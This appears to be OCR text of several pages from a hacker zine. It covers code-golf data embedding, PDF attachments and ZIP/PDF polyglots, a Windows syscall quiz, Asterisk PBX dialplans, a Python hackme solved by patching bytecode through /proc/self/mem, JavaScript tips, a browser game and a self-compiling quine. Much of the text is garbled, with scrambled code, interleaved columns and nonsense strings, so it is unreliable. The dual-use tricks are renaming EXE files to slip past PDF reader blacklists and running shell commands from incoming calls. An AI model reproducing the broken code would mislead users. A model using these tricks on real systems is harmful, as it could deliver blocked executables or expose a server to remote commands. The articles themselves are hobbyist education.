THFVqjozU | ?XeU| |M|Nd3K2QHh=Wd_r7-bSx7~4>Q~U|Nj@Wupez~y4cvfuASLVZp&aW=2 
20cT7srqa#y58yCq8LzX?Pee! gk9*=LnP7F (Bd=3*#0 ‘ QWX2fGIVOexNm|C-+uQsdM-Eq 
8eUw*$Ug_Z5J94bE&77_?*v#6TxaFSkPt8cVTA;T10dYc; OVNWjLb}IAj| 2(z;Y+ZSCXI 
PsQ6MItfU! ; !AHXYKxPrI2yPi+MYruO<}n~Ef+)ad5@AIU1*9qg>97*OWLO2?TQM*x*qFY 
@rgq{6=JpT77Or (3%| -B&9! xp(w##q_&@FaMTUO8odhRJa*hh ‘ MuTqsfu8SN4is*%q° tW6 
cMh%b ) hHkSU ‘Os * hmO“Eb=yX6xGB{PR$qxZp}q3+rCn7BOr0e81Cly_Ov+S@ZAnRMoKEW 
$SzSD_2#1{SEqZ#7tD ‘NLU8T88&av Lo@@YGsLcPUEef$* | R5ee_LnGPM@;%-BwKt7NX)V 
p4WIz&t9)M>7>k6{>N8& > |W* | *=iY500<_c  MkNr#TK*v6*FnMHMR#06#cgSyz; @?vbYB 
<Z1xMOn(*| ?d2Sq(u?) *S<zu9BI)Ct&$8-6TU!2°0?;09=8{VVML | P*#o0d0qzlo_jRU2< 
Ra=61L}QpQc%_exKO)e7@-4x%Fo120u7?ku* ouf*46j_Mvtj>kB+&S ) | wce(NbI*RQo- ?q 
3!0zFwiFPO*FU! }WmSCShyhLj9SEOYK | t-~IpdQ+ABpo? | jHN%}M{T* 5mc7bewB jymWcU 
fR1WeDCTTQ-x98MZOUG- ‘v{PeY@WkYu0O3mOGDILtgn?I4w!*+)rdG! sByt6fsZ_{M*LP 
ZUka9 | 5“L~W2ieZd1S=8Jghz&<1lYO~c)I$ztaDOeOss'),-8)) 


...a working solution that is only 982 bytes! You can 
count them all ;) Notice the import statement and lack 
of b before the encoded data string. Remember that 
many text editors add an additional new line character 
to saved Files. Get rid of it! It’s whole 8 bits, 8 bits too 
many For a code golf competition... 


0x03 GOING FULL BINARY! 


What about skipping b85encode and embedding raw 
binary compressed data in script? Wait. That's illegal! 


#coding=11 
import zlib;open('confidence.png','wb').write(zlib.d 
ecompress(open(__file__,'rb').read()[111:],-8))#4 © 


Yes, after # goes binary zopfli output. Not included 
here due to XTIpX complaining... This makes a 821 
bytes solution. A certainly dirty but working solution! 
So, this works for some binary data and some en- 
codings. IF you do really want to use this trick, For 
whatever reason, you can just go brute-force and 
generate Files with all FyEnOD encodings from the 

ng ases.aliases.keys() and your binary 
data then anrr running TREE, Pick smallest working one. 
And remember... Do try this at home! 


Community Advertisement 


Community Advertisement 


Edit View Windows Debug Help 


Graph (main) Disassembly 

g)| int main (int argc, char **argy, char **envp); (fen) main 

main 

entry.finiO ar int32_t var_8h @ ebp-@x8 

entry.initO arg int32_t arg_4h @ esp+0x4 

cn) main @x@80485f5 lea ecx, [arg_4h 
main @x@80485f9 and esp, Oxfffffffo 

main r int32_t var_8h @ ebp-@x8 @x@80485fc push dword [ecx - 4 

sym.plt.got int3? t arg 4h @ ecntOyd @xARA4R5FF push ebp 


by 
sym._libc_csu_fini p, esp 


ox 
sym._libc_csu_init cx 
sym._x86.get_pc_thun f ! = r Ox, ecx 

sp, Oxc 
sym._fini 


sym._init 
sym.beet sp, 0x10 
sym.deregister_tm_clones Free and Open Source RE Platform powered by radare2 pip Sibis 


CALL FOR CONTRIBUTORS. 


sym.register_tm_clones 


entry0 


ax, dword [eax 


sp, Oxc 


sym.rot13 ~ res + 
n the ; ae 


sp, 9x10 
Cutter is a Qt and C++ GUI for radare2. Its goal is to be an advanced, free, pevrnte 


A 7 sp, @xc 
open-source, and easy-to-use reverse engineering platform. 


18 Items sp 0x10 


x8048665 
Graph Overview sp, @xc 


Telegram: t.me/r2cutter 


://cutter.re Twitter: @r2gui | 


@x10 

@x@804866a var_8h 
@x0804866d 
@x0804866e 
¢ @x@804866f 
@x@8048670 
sub esp, @xc sub esp, @xc @x08048673 
= ale @x08048674 


Dashboard |_ Strings | Imports | Search | Grap 


Adding any external data 
to any PDF 
Attaching 


Name 


G |_] hello.zip_ 


To attach a file to a PDF, you can rely on free 

tools out there: 

pdftk doc.pdf attach_files myfile.bin 
output attached.pdf 

Note that Adobe Reader forbids to download 

EXE, VBS or ZIP files, so you might want to 

rename their extensions. 

When attaching such files, the entire PDF is 

recreated, so you can't revert to the original doc. 


Incremental updates 

A more elegant way to attach a file is to do it via 
an incremental update, so that you make it clear 
that the file was attached afterwards: the content 
of the original file body is unmodified, only the 
updating elements will be appended: an XREF 
update, a new catalog that references the 
attachment, the attachment declaration and its 
data stream. 


import fitz # from PyMuPDF 
doc = fitz.open(pdf) 
# create an attachment 
# modify the extension to bypass blacklisting 
doc.embeddedFileAdd (name, 

data, name, name + "_") 
# save incrementally 
doc.savelIncr() 
This script may look really simple, but it will 
handle for you complex cases such as 
linearization, object streams or classic xrefs, will 
only append new or updated objects and leave 
the original file body intact, and will give back a 
perfectly valid PDF file. 
That said, if you attach a ZIP to a PDF, you 
could think of making it a ZIP/PDF polyglot. 


Incompatibilities with polyglots 
But these are mutually exclusive: even if you 
store the incremental update with no 
compression via: 
doc.save(doc.name, 

incremental=True, expand=255), 


some incompatibilities will remain. 


angealbertini 
http://github.com/corkami/ 
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Absolute offsets 

To be perfectly compatible (for example with 7z 
or Windows Explorer), a ZIP needs its offsets to 
be re-adjusted so that they are absolute to the 
file, not relative to the start of the archive. This 
can be fixed in place with the Info-ZIP zip -F 
command. 

But then when you extract the ZIP as a PDF 
attachment, its offsets will be incorrect again, as 
only the attachment will be copied out of the file. 


Embedding by hand 
So you may want to drop the attachment 
functionality altogether, and just embed the file 
as a single data stream instead: 
# create a dummy object entry 
objNb = doc._getNewXref () 
doc._updateObject(objNb, '<<>>') 
# add contents of the archive 
doc._updateStream(objNb, 

Zipdata, new=True) 


Appended data 

Some tools will still complain that there is 
appended data after the archive when you read 
it from the polyglot. A workaround is to extend 
the archive comment to the end of the file once 
it's in the polyglot: 


# locating the comment length jn the ZIP's EocD 
# 4:Sig 2:NbDisk 2: NbCD 2:TotalDisk 2:TotalCD 
# 4:CDSize 4:0ffset 2:ComLen 


offset = filedata.rfind("PK\5\6") + 20 

# new comment length 

length = len(filedata) - offset - 2 

with open(pdf, "wb") as f: 
f.write(filedata[:offset]) 
f.write(struct.pack("<H", length) ) 
f.write(filedata[offset+2:]) 


To avoid archive viewers to show an archive 
comment that is now full of PDF keywords, a 
working trick is to start the comment with a null 
byte: just append such a byte to the ZIP when 
adding it to the PDF document. 


Conclusion 

Attaching a file via an incremental update is an 
elegant way to extend a document while 
preserving its original structure. 

But a ZIP file can't be at the same time attached 
to a PDF doc and referenced externally as a 
ZIP/PDF polyglot. 


Ange Albertini with the help of 
Nicolas Grégoire, Gynvael Coldwind and 
Philippe Teuwen. 


Ange Albertini 
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The \TeX{}nicalities of Paper Folding 


Three years ago, I ex First, we create a box containing a mini- ‘perimented with a fold- 
ing puzzle in PoC||GTFC page containing the entire content of the outer ) issue 0x11. The editors 
and I eventually decided two columns: : | to scrap the puzzle be- 
cause it distracted from 
of the article in which it 
idea did eventually inspit 
zle from page 21 of PoC} 
implementation of the p 


simpler; a straightforwar } 


: the underlying content 
was to be inserted. The 
‘e my paper airplane puz- 
|GTFO 0x13:02, but the 
aper airplane was much 
id exercise in TikZ. 


\newsavebox{\foldedcontent }% 
\savebox{\foldedcontent}{% 
\begin{minipage}{0.5\foldedwidth} 
This will be the content that 
is in the outer columns. 
\end{minipage }% : 


Next, create the two outer columns using 
TikZ’s clipping feature, and distribute them 
horizontally using \hfill: 


We 


Camusyar 


\noindent\begin{tikzpicture} [remember picture] 
\clip[use as bounding: box] (0,0) rectangle 
(0.5\wd\foldedcontent ,-\foldedheight) ; 

\node[anchor=north] at 
(0.5\wd\foldedcontent ,0) (leftfold) 
{\usebox{\foldedcontent}}; 

\end{tikzpicture}\hfill% 
\begin{tikzpicture} [remember picture] 

\clipluse as bounding: box] (0,0) rectangle 
(0.5\wd\foldedcontent ,-\foldedheight) ; 


\node[anchor=north] at (0,0) (rightfold) pe ce 


{\usebox{\foldedcontent } }; 


end{tikzpicture c 5 
aia a } ; is demonstrated on this 


It’s one thing 


The original puzzle, as 
page, was much more 1 The “[remember picture]” option is so }xXnical. 
more difficult to typeset: (t.e., “leftfold” and: “rightfold”) can be text that seamlessly and 
cleanly spans across a f referenced from other ‘pictures. We will use old break. I wanted to 
benefit from the beautif this next. The columns are differentiated by ul TEX line breaking al- 
gorithm discovered by M placing the nodes at different locations rela- ‘ichael Plass in his Ph.D. 
with Donald Knuth. tive to the clipping rectangle. 

The naive approach we Thus far we have two outer columns with 5uld be to simply typeset 
all of the text separately, whitespace in between. The final step is to use , manually slice the PDF 
using an image manipuli TikZ’s “overlay” feature to overlay a mini- ation program, and then 
embed it back in the proj page containing the middle content inside of yer layout. However, this 
requires manual process the whitespace: 
tial to break features lik 
graphics. 

A more seasoned TRXn 
a package like shapepar. 
in the middle, into which 


ing, and has the poten- 
\begin{tikzpicture} [remember picture, overlay] ? copy/paste and vector 
\node[anchor=north] at ($leftfold.north east) 
10.5! (rightfold.north west)$) { 
\begin{minipage} [b] {0.46\wd\foldedcontent } 
This will be the content in the center. 

\end{minipage}}; 

\end{tikzpicture} 


iician might choose to use 
sty to create whitespace 
the center column could 


be inserted. However, th 
space of the inner colum1 
TEX to either add whites] 
Paragraph manipulation 
words to span the folds, 
words like “sesquipedalié 
The TrXnique at whic 


combination of \newsav« 


Here is a minimal example 


‘is will treat the negative 
a as a line break, causing 
pace or hyphenate words. 
will not allow individual 
as will happen with long 
inism.” 

th I arrived was to use a 
ebox and TikZ clipping. 


to draw some fold lines: that the coordinates: of the named nodes on a page, but it’s much | 


https://www.sultanik.com/ 
https://twitter.com/ESultanik 
https://github.com/ESultanik 


Evan Sultanik 
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Windows Syscall Quiz 


by Mateusz Jurczyk (j00ru) 


Do you consider yourself a Windows internals expert? 
If you do, then try to correctly answer the following 
questions. If not, feel free to follow along and hopefully 
learn some interesting facts about the kernel of the 
most popular desktop operating system in the world. © 


The quiz: 


1. How many syscalls do Windows NT 4.0 and Win- 
dows 10 1903 have, i.e. how much has the system 
call table grown in the 23 years between 1996-2019? 


2. Are there differences in the syscall interfaces be- 
tween various editions of the same versions of Win- 
dows? 


3. Have any legitimate driver ever registered their own 
syscall table(s) beyond the standard ntoskrnl.exe 
and win32k.sys? 


Ready? Let’s see how you did! 


Question 1: syscall table growth 


The first release of Windows NT 4.0 Workstation had 
210 core system calls and 496 graphical ones, adding up 
to a total of 706. At the time of this writing, the latest 
32-bit build of Windows 10 declares 464 + 1256 = 1720 
syscalls: 


1250 ® Windows NT 
4.0 

1000 ® Windows 10 
19H1 


750 


500 


ntoskrnl.exe 


win32k.sys 


This is a 143% increase in the size of the interface, 
which is an attack surface available to locally running 
code. In other words, a new system call has been 
added on average every week for the past two decades. 
Of course it is not a fully precise metric as it doesn’t ac- 
count for code hidden behind the win32k!NtUserCall 
family, IOCTLs and many other factors, but it does il- 
lustrate the growth of the kernel complexity over time. 
Fortunately, starting with Windows 8 developers can re- 
strict access to parts of the attack surface for their sand- 
boxed processes, thanks to new features such as the sys- 
tem call disable policy*. 


Thttps: //docs.microsoft.com/en-us/windows/win32/api/ 
winnt /ns-winnt-process_mitigation_system_call_disable_policy 


Blog: https://j0Oru.vexillium.org/ 
Twitter: https://twitter.com/jOOru 
GitHub: https://github.com/j0Oru 


Windows Syscall Quiz 


Question 2: cross-edition differences 


As a general rule, various editions of the same OS 
(Home, Pro, Enterprise etc.) use the same underly- 
ing kernel and thus share the same set of system calls. 
However, there is one notable exception. In May 2019, 
I noticed that in the syscall tables served on my blog, 
there were a few names only present in Windows NT 
4.0 SP4, but not in SP3, SP5, or any other system. One 
such symbol was NtCreateWinStation: 


Windows NT 
(hide) 


| sp3_| spa | sp5 | spo | 


System Call Symbol 


tCreateToken 0x0026 | 0x0026 | 0x0026 | 0x0026 
tCreateWinStation || 0x00d3 | aan | a 
tDelayExecution 0x0027 | Ox0027 | Ox0027 | 0Ox0027 


After a brief evening research with Gynvael Coldwind, 
we figured out that these syscalls (5 of them in total) 
were only found in the Terminal Server Edition of Win- 
dows NT, released two years after Workstation. Consid- 
ering that the data came from the original table created 
by skape and hosted by Metasploit, the list for SP4 must 
have been extracted from a TS version of the system, un- 
like for other service packs, and so it has stayed this way 
up until recently. And so the riddle was solved. 


Question 3: non-standard syscall tables 


In that same evening, we decided to finally establish if 
there ever had been real syscalls with IDs above 0x2000, 
i.e. registered in the SSDT by a non-standard driver. 
We had heard rumors about IIS doing it at some point 
in time, but we had never observed it in real life. 

Very quickly, we found several online sources confirm- 
ing that story for IIS4 and IIS5, on Windows NT—2000. 
Some of them pointed us to a driver called SPUD.sys, 
which stands for Special Purpose Utility Driver (if you 
find that name funny, check the story behind afd.sys). 
We found the driver on an extra Option Pack CD for 
Windows NT, and on the standard installation disk of 
Windows 2000. This way, we confirmed that it indeed 
called KeAddSystemServiceTable with 9 entries in IIS4 
and 7 entries in IIS5. We also learned that the associ- 
ated ring-3 library was isatq.dl1l, with “atq” meaning 
asynchronous thread queue. The only missing piece were 
the names of the syscalls. 

After another while of recon, we managed to dig 
out the symbols for both versions, in a dedicated 
.cab archive (NT) and a complete system symbols 
package (2000). Our curiosity was finally satis- 
fied, with the mysterious syscalls turning out to be 
SPUD{Initialize, Terminate, TransmitFileAndRecv, 
SendAndRecv, Cancel, GetCounts, CreateFile} in 
IIS5, with the addition of SPUDCheckStatus and 
SPUDOplockAcknowledge in IIS4. It was a fun arche- 
ological adventure into operating system prehistory. 


Mateusz Jurczyk 
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Let Your Server Anwser the Phone 


Let Your Server 
Answer the Phone 


Ft. Clvrpny, https://disconnectmy.icu 


Have you ever wanted to play a game with a landline 
telephone? Do you need to chat with friends but Discord 
is down again? Did something happen to your VPS but 
you don't have a laptop nearby? Stop worrying and start 
using a PBX to solve your issues! A Private Branch 
Exchange, as official as it sounds, isn't just for 
businesses. With the proper configuration, your PBX can 
be used for fun as well! Here are a few ideas and 
example snippets to get started. 


Note: The following examples are excerpts from dial 
plans, running on open source software Asterisk PBX 
(www.asterisk.org). You will also need a SIP trunking 
provider to forward VoIP calls to your server! 


Diaplan Basics 


In Asterisk, a dialplan is a file (or files) that determines 
how calls are answered, routed, and hung up as they 
pass through your PBX. Each entry in a dialplan has an 
extension, priority, and an application, such as: 


exten => 300, 1, Answer (50) 


This example simply opens a line when a call comes 
through on extension 300. Additional functions must 
have an incremental priority number. In general, be sure 
to always answer and hang up a call as it progresses 
through the dialplan. Start out with a simple dial plan that 
plays a greeting sound and waits 10 seconds for an 
extension: 


exten=> _+<PBXnumber>,1,Answer (50) 
same => n,Background(greeting) 
same => n,WaitExten (10) 

same => n,Hangup() 


Conference Room 
With a simple one-line addition to your dialplan, you can 
easily set up a conference room for you and your friends 
to discuss important matters: 
exten => 123, 1, ConfBridge (123) 
Running Commands 
Your PBX can be used to run commands remotely in a 


pinch. Please note that there is a lot to learn in regards 
to securing a PBX, meaning this is probably not a good 


Cleverpony 


WTFPL 


Phreaking 


idea unless you are confident in your ability to configure 
one! The command will execute using the system’s shell. 


exten => 3,1,Shell(echo “Incoming!”) 


Dungeon Crawler 


Stitching together extensions, redirects, and messages, 
it is easy to create a dungeon crawler style game 
playable entirely through a phone! For example, let 
buttons 2 and 8 be North/South and 4 and 6 be 
East/West. 


[enter] 

exten=>100,1, Background (greeting) 
exten=>2,1,goto(locA,start,1) ;North 
exten=>8,1, Playback (blocked) ;South (X) 
exten=>8,2,goto(enter,100,1) 


; East/West 

exten=>4,1, Playback (blocked) ;East (X) 
exten=>4,2,goto(enter,100,1) 
exten=>6,1,goto(locD,start,1) ;West 


[locA] 
exten=>start,1, Playback (locA_audio) 
exten=>8,1,goto(enter,100,1) ;South 
exten=>_X,1,Playback (blocked) 

same =>n,goto (locA) 

[locD] 
exten=>start,1, Playback (locD audio) 


exten=>6,1,goto(enter,100,1) ;West 
exten=>_X,1,Playback (blocked) 
same =>n,goto(locD) 


This example only has three distinct areas, the entry 
area, location A (to the north) and location D (to the 
east). Attempting to move in a direction where there isn't 
an area will play a message claiming that the direction is 
invalid. This is a simple example, for something more 
complete consider first drawing a flowchart of areas and 
such. 


For location audio, Asterisk expects a GSM audio file, 
which it can natively convert from 8kHz mono WAVs 
through the console command: 


file convert audio.wav audio.gsm 

In addition, Asterisk supports setting and controlling flow 
based on variables, which can be used to implement a 
simple inventory system! As variables and logic are 
rather large topics, it is recommended to review them on 


the official online documentation: 


https://wiki.asterisk.org/wiki/display/AST/Variables 


disconnectmy.icu 


rail 


Programming A Python Pwnliner's Tale 


A PYTHON PWNLINER'S TALE 
INTRODUCTION 


A while back, the friendly warlock @domenuk posted a series of small hackmes 


fitting the size of a tweet. Among them, the one showed to the right. 


Dorn 


he 


It didn't take long for the community to realize that this challenge is trivially Aetsbogeone nr) 
solvable using the ct ypes or inspect module. This was challenge enough to tei $6 ‘eta 

come up with a solution which works out of the box without relying on additional de} pac Olution () tion) 

modules. import 


Furthermore, it is an old tradition to express spells in single, unreadable lines, so 


the following scroll of solvableness was crafted eventually: 


oS (Lambda: 
Xr 9.read(y-— 
[x[0] split (ys) 


[(x,y.find (globals ( 


if rag: antigravi ty 


PrN 'Solveqny 
#Everyh, 
Pores ney LovePytp, 
MEP AStebin yas nite Male 


N.com/gg 7HINTS 


if g.seek(x)]] | x in [x.spli : 116),int(x[1 ) ['solve_me'] 
Lae ye plit ( 1,16), 0 ' ~ “code, 
** Y!=-1 and 9-Seek (xtyhogery * 2p. OPEN" /proc/self mayer r  SeLE/meM", roy coo ee) for x,y,g in 
read ( rx in 


List compr ehension 
for non-readabilit y! 


two files 


Secondly, are opened and used by the spell: 
"/proc/self/mem" and "/proc/self/maps". Both are 
special files in the process information pseudo-filesystem in Linux; 
the former poses an interface to read and write a process's memory, 
in a_ textual 


while the latter shows its memory mapping 


representation, as shown for a dummy executable on the right. 


Thirdly, the spell seems to look for globals() ['solve_me' 


OBSERVATIONS 


There is a lot to unpack here, but a couple of things become immediatly visible upon closer examination: 


PPCREE COT Tea te ag da x{1)]] 


Firstly, the full solution is squeezed into a single lambda function allowing for a solution within a single 
expression. However, those anonymous functions forbid to assign variables in a traditional way, an obstacle 


circumvented by the author via excessive use of list comprehension. 


] .__.code___.co_code within the process's memory. This is an 


In [1]: import dis 


In [2]: dis.dis(solve_me) 
2 Q LOAD_FAST 0 (solution) 
3 CALL_FUNCTION 0 (0 positional, 
6 STORE_FAST (res) 
3 9 DELETE_FAST (res) 
4 12 LOAD_CONST (0) 
15 LOAD_CONST 0 (None) 
18 IMPORT_NAME 0 (antigravity) 
21 STORE_FAST 2 (antigravity) 
5 24 LOAD_FAST (res) 
27 POP_JUMP_IF_FALSE 40 
6 30 LOAD_GLOBAL (print) 
33 LOAD_CONST 2 ('solved') 
36 CALL_FUNCTION (1 positional, 


39 POP_TOP 
>> 40 LOAD_CONST 0 
43 RETURN_VALUE 


(None) 


So, what is going on in the spell? At the end of the day, its 
conceivably simple: The anonymous function parses the content 


of "/proc/self/maps" to find writeable memory segments 


in the process's memory space to prevent SEGFAULTS later on. 
It then searches for occurences of the solve_me bytecode 
within those writeable segments and writes the byte \x02 at 
offset 25 from the found location. 

As a result, instead of the reference to local variable 1 (res), 
the reference to local variable 2 (antigravity) is pushed 


onto the stack for evaluation. 


@nSinusR 
https://www.tasteless.eu 


easy way to retrieve the python bytecode of the 
solve_me function, and its disassembly is 


shown on the left. Note the LOAD_FAST 


0 keyword pair) 


instruction at offset 24: this pushes the reference 
to the variable res for evaluation onto the 
stack. It is afterwards evaluated at offset 27 with 
the POP_JUMP_IF_FALSE instruction. 

These two 


instructions are the bytecode 


equivalent of the line containing "if res:" in 


0 keyword pair) the original challenge. 


PUTTING IT ALL TOGETHER 


As this variable is declared, the script will happily print "solved" 


when executing the bytecode of sol ve_me. Clever, huh? 


P.S.: Below is the example solution by @domenuk, based on 


inspect - but this is a story to be told another time. 


def solution(): 
import inspect as i,webbrowser as w,ctypes as c 
def o(x): 
for f in i.stack() 
f£.f_locals["res"]=1 
c.pythonapi.PyFrame_LocalsToFast ( 
c.py_object (f), c.c_int (0)) 


w.open=o 


Javascript - Global Variables 


JAVASCRIPT TIPS AND TRICKS 


- Global variables 


Declaring variables is not always easy. In current browsers, — This will obviously output Tl in the console. Because the 


the global variables are stored in the window object and code is not executed in a function, the context will be 


sometimes, you may declare them 
even if you don’t want to. 


Also there are 3 ways of defining variables: 


const variable = 0; //block scoped, won't be reassigned 
let variable = 0; //block scoped, may be reassigned (like 
counter in a loop) 

var variable = 0; //and 


variable = 0; //function scoped, may be reassigned 


global. This means that window.mysteryVariable 
contains Tl as well. 
Sometimes JavaScript could be tricky since you can 


override existing global variables or functions: 


function alert () { 


console.log("Overriden alert’): 


} 


alert(’Hello world’): 


‘function scope’ means that a given variable is available When executing window.alert (or just alert), it won't show 


inside the function it was created in; if not createdinsidea the alert popup since we have overriden the native alert 
function, it’s global. function. 
*block scope’ means that a variable is available inside a 


block, i.e. anything surrounded by currly braces. If we want to keep the variable's name, then we need a 


wrapping function (to prevent overriding existing global 
There is also strict mode in JavaScript. That mode is variables or functions) that is immediately called, like 
declared by adding “use strict"; at the beginning of a below: 


script or a function. th : : ‘i 
p var alert = “overwrites window.alert’; 


(function () { 


let alert = "scoped to function’; 


Declared at the beginning of a script, it has global scope, 
but declared inside a function, it has local scope. 


With strict mode, you cannot, for example, use undeclared 
console.log(alert): 


0: 


Also, you can send the window and other globals as 


variables. 


“use strict"; 


variable = 3.14; // error: variable is not declared ; - 

arguments to that function. This is often used, for example, 
var variable = 3.4; // this will not cause an error a — : 
in jQuery plugins (jQuery allows you to disable the $ 


Now, let's assume you have the following code: reference to the jQuery namespace). 


var mysteryVariable = 11; (function(s) { 
console.log(mysteryVariable): Palensteamec ere enone st) 
})GQuery); 


Dorian Mazur https://mazurdorian.pl 
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bomb out! 


Dyna Blaster was always my favorite party game, but it 
wouldn't fit on a single page. But hey, Bomb Out! does! 
Controls: Player 1: WSAD+1, Player 2: T | (+4 

Gynvael Coldwind 


P.S. Make sure red-italics are unbroken strings - copy/paste will break it! 


<html><style> /* Bomb Out! by Gynvael Coldwind */ 
body {margin:@; padding: 0} /* Paged Out! #1 */ 
div {width:3@px; height:30px; position: absolute; 
font-size:3@px} /* Works on Chrome/FF/Edge! */ 
.bg {width:720; height:480; background: #0c1} 
-wall {width:20px; height:2@px; border-width: 5px; 
border-style:outset; background: #ccc} 
.brick {border-style:outset; border-width: 3px; 
width: 24px; height:24px; /* | 4-bit BMP (RLE) */ 
background: url( ‘data: image/bmp; base64, QRI@AAAAAAA 
AAE TAAAAOAAAACAAAAAGAAAABAAQAAGAAADIAAAAJLGAATY4A 
AAMAAAADAAAAPKSRAMPDwwDa2 toAAgIGEQAAAgGIGEQAAAgGEGI 
GAACAAAAAATERECEQAAAAGREQIRAAAACCII(ASTAAAGAAAE ' ) } 
-player {width:26px; height:26px; z-index:2; 
margin: -8px @ @ -8px} /* Code is pretty... */ 


.bomb {margin:-7px @ @ -4px; z-index:1} /* ... */ 
.boom {font-size:34px; z-index:2; Ue easy Si 
margin: -8px @ @ -8px} /* ...compressed ;) */ 


@keyframes bb {0% {background-color:#cef} 
100% {background-color :#9df}} 
.bonus {font-size:20px; animation:bb 1s infinite; 
text-align: center} /* ...but still readable! */ 
.txt {width:100%; text-align:center; top: 2px; 
font-family:sans-serif; font-size:22px} 
</style><body><div class="bg"> <!-- ...kinda 
<div class="txt">Bomb Out! </div></div></body> 
<script 
src="https://code. jquery.com/jquery-3.4.1.min.js" 
integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMG 
WSFLBw8HfCJo=" crossorigin="anonymous"></script> 
<script> PX='px'; /* var|@ is a cast to int */ 
Pos = (e,x,y)=>e.css({left:x|O+PX, top:y|@+PX}); 
Div = (c,x,y)=>Pos($('<div/>',{class:c}),x,y) 
-appendTo(BG); /* | pixel pos * 1D index conv */ 
I2px = (i)=>[15+(i%23)*30, 30+(i/23|0)*30]; 
Px2i = (x,y)=>((x-15)/30|0)+(y/30-1|0)*23; 
Collpx = (x,y,nc)=>!nc.includes(Px2i(x,y) )&& 
(MMAP[Px2i(x,y)]]|[@])[@]5 
MmapAdd = (c,i)=>MMAP[i]=[c,Div( 
(9; wall’, *brick’, "bomb" ][c],5«..I2px(i))}]3 
Rnd = Math.random; 


--> 


AVATAR = ['&#x1F63E;', '&#x1F608; ']; 

PPXPOS = [[47,62], [647,422]]; 

PIPOS = [[24],[32@]]; PINV = [[1,3],[1,3]]3 
KEYB = [ |} MBOMB = [ |; MMAP = []§ MITEM = [ ]; 


LASTTM = $.now(); DEAD = 9; END = @; 

Boom = (bomb,pos,pl,range,dir=9)=>{ 
MBOMB[ pos ]=@; MMAP[pos]=[@]; bomb.remove() ; 
PINV[p1][O]++; /* | explode in every dir */ 
[-23,23,-1,1].map((v,j)=>{ if(j==dir) return; 
for(let k=0;k<range;k++){ 

let c=post+v*k, p=I2px(c), e=MMAP[c]|]|[0]; 
if(e[@]==1) break; 

let x=Div('boom',...p).htm1('&#x1F4A5;'); 
x. fadeOut (500, ()=>x.remove()); 
PIPOS.forEach( (pipos, p1)=>DEAD|=pipos.some( 


https://twitter.com/gynvael 
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Bomb Out! 


i=>i==c)?PDIV[pl].html( '&#x1F48@;')|1<<p1:9); 
if(e[@]==2) { e[1].remove(); e[e@]=0; 
if(Rnd()<@.3) { let t = (Rnd()<@.5)|@; 
MITEM[c] = [t,Div('bonus',...p).htm1( 
[ '&#x1F4A3;','&#x1F525;'][t])]; } break; } 
if(MITEM[c]) { 
MITEM[c][1].remove(); MITEM[c]=@; break; } 
let b=MBOMB[c]; if (b) { 
clearTimeout(b[1]); b[@](b,c,pl,range,j); } 
}})} 
Mainloop = ()=>{ 
if(END) return; 
let tm = ($.now()-LASTTM)/1000;LASTTM = $.now(); 
[38,40,37,39,87,83,65,68].forEach((c,i)=>{ 
if(!KEYB[c]) return; /* 1 these are keycodes */ 
let k=PPXPOS[i>>2].map((v,j)=> 
v+[[@,-1], [0,1], [-1,0], [1,0] ][i%4][j]*tm*12@) ; 
let kk=[@,1,2,3].map( /* 4 corners of player */ 
j=>[k[O]4267( 81) k[ 1426" (9551) 1), qaiss2; 
if(!kk.some(t=>Collpx(...t,PIPOS[q]))) { 
PPXPOS[q]=k; PIPOS[q]=kk.map(t=>Px2i(...t)); 
PIPOS[q].forEach(c=>{let b=MITEM[c]; if(b){ 
PINV[q][b[@]]++; b[1].remove(); MITEM[c]=0; 
eneer /* Movement model is kinda bad TBH */ 
[13,49] .forEach((c,i)=>{ /* <— keycodes too */ 
if(!(KEYB[c]&&PINV[i][@])) return; KEYB[c]=0; 
let m=Px2i(PPXPOS[i][@]+13,PPXPOS[i][1]+13); 
if(!MBOMB[m]) { 
let b=Div('bomb',...I2px(m)).htm1('&#x1F4A3'), 
cb=()=>{Boom(b,m,i, PINV[i][1])}; 
MMAP[m]=[3]; PINV[i][@]--; 
MBOMB[m]=[cb, setTimeout (cb, 3000) ] ; 
}})3 
PDIV. forEach((c,i)=>Pos(c,...PPXPOS[i])); 
if(DEAD) END=$(".txt").html(DEAD==3?"Draw!": 
"Player "+AVATAR[ (DEAD==1)|@]+" wins!"); } 
Resetmap = ()=>{ 
BG=$(' .bg')[@]; 
for (k=O; k<15*23;k++) { 
let i=k%23, j=k/23|0; /* | taxi distance */ 
if (Rnd()<0.6&&[ [1,1], [21,13]].every(p=>Math. abs 
(i-p[@])+Math.abs(j-p[1])>1)) MmapAdd(2,k); 
Af (!(i%2| | j%2)| | !i] |i==22] | !5] |5==14) 
MmapAdd(1,k); } 
PDIV=[@,1] .map( 
i=>Div('player',...PPXPOS[i]).html(AVATAR[i]))} 
$(function(){ $(document) .keydown(e=>KEYB[ 
e. keyCode]=1) . keyup(e=>KEYB[e. keyCode]=@) ; 
Resetmap();setInterval(Mainloop, 15);});</script> 
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quinesnake - a quine that plays snake over it's own source! 


\¢ | U nesna ke github.com/taylorconor/quinesnake 


a quine that plays snake over its own source! It compiles itself! Run it with . /quinesnake. cpp 


/*bin/1ls>/dev/null;sed -n 's/.*.\/\*\(.*\)../\l/p' $0|I=$0 sh;exit;*/std::map<I, 
I>m={{97,1},{'w',/*echo g++ -std=c++11 -oo $I -lcurses -DI=int -DF=if -DK=ret\*/ 
2},{'d',3}};I/*urn -includectime,curses.h,iostream,map,unistd.h|sed s/,/\ -in\*/ 
w=80,h=28,x=2,y=2,a=2,b=0,d,e,2=768;std: :wstring/*clude/g|sh;./o</dev/tty;exit*/ 
s=LR"x(/*bin/1ls>/dev/null;sed -n 's/.*.\/\*\(.*\)../\1/p' $0|I=$0 sh;exit;*/std: 
:map<1I,I>m={{97,1},{'w',/*echo g++ -std=c++11 -oo $I -lcurses -DF=if -DK 
=ret\*/2},{'d',3}};1/*urn -includectime,curses.h,iostream,map,unistd.h|sed s/,/\ 
-in\*/w=80,h=28,x=2,y=2,a=2,b=0,d,e, 2=768; std: :wstring/*clud sh; ./o</dev/tty 
;exit*/s=LR"x%dx";I G(I x,I y){K 3&s {(s[y*wtx]&=~z) | 
!d&&y++;d==2&&y--; F (d==3) x+=2;}1I M(){curs_ 
eout(0);F(!G(a,b))C(a,b,2);else M();}I A(I 
+x ]&=~3072) |=d<<10;}1I T(){d=A(x,y) ;F(0<=( 
7P(d,x,y) ;F(x<0| |y==h| | y<0| |x>w-2||G(x,y)& 
]&=~z;P(A(a,b),a,b);}C(x,y,1);move(0,0);fo 
